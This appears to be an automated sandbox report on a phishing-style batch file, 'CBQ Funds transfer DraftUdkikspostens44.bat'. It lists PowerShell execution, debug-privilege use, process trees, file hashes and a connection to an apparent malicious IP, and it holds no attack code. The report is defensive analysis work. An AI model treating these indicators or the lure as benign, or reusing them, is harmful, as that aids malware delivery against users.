Malware Analysis Report

2025-08-05 22:19

Sample ID 240610-txvdhstdlp
Target CBQ Funds transfer DraftUdkikspostens44.bat
SHA256 7ae20837250877cb92dbee596d6deb6e15b09480408a0050d21b2332152f2af9
Tags execution
Score 8/10

Analysis Overview

Score 8/10
SHA256 7ae20837250877cb92dbee596d6deb6e15b09480408a0050d21b2332152f2af9

Threat Level: Likely malicious

The file CBQ Funds transfer DraftUdkikspostens44.bat was found to be: Likely malicious.

Malicious Activity Summary

execution

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-06-10 16:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-06-10 16:26
Reported 2024-06-10 16:32
Platform win10v2004-20240508-en
Max time kernel 298s
Max time network 293s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"

Network

Country Destination Domain Proto
BG 194.59.31.187:80 tcp
US 52.111.229.43:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e1uigytw.gzo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral2

Detonation Overview

Submitted 2024-06-10 16:26
Reported 2024-06-10 16:32
Platform win11-20240508-en
Max time kernel 297s
Max time network 293s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CBQ Funds transfer DraftUdkikspostens44.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Programdiskes.pub && echo t"

Network

Country Destination Domain Proto
BG 194.59.31.187:80 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mqzed1ta.o2i.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2796-17-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp